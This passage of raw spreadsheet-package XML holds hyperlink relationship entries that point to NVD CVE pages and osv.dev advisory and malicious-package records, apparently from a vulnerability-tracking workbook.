Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98026" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98028" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98031" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98032" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98033" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98034" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98035" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98036" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98037" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98038" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98039" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98040" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98042" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98043" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98044" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98045" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98046" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98047" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98048" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98049" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98051" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98053" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98054" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98055" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98057" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98058" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98059" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98060" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98061" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98062" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98063" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98064" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98065" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98066" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98067" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98068" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98071" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98072" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98074" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98075" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98076" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98077" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98078" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98079" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98080" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98081" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98082" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98084" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98085" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98086" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98087" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98088" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98089" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98090" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98091" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98092" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98093" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98094" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98095" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98097" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98098" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98099" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98101" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98102" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98103" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98104" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98105" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98106" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98107" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98109" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98110" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98111" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98113" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98114" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98117" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98118" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98119" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98120" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98121" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98123" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98124" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98125" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98126" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98127" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98128" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98129" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98131" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98132" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98133" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98134" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98135" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98136" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98137" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98138" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98139" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98140" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98141" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98142" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98144" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98145" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98146" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98147" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98148" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98149" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98151" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98152" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98153" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98155" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98157" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98158" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98159" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98160" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98161" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98162" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17186" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17181" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17182" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17183" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17184" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17185" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17187" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17188" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87902" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65660" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67279" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88351" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97230" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51994" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92288" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51997" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85491" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88361" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88362" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88373" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88388" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88369" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53493" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88359" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88367" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95811" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97636" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93353" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88386" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97326" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97646" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88370" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97225" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48543" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97320" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97325" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97366" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97368" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97648" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97650" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97649" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57440" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61823" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61825" TargetMode="External" Id="rId818" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100382" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100075" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14281" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92161" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92609" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93643" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 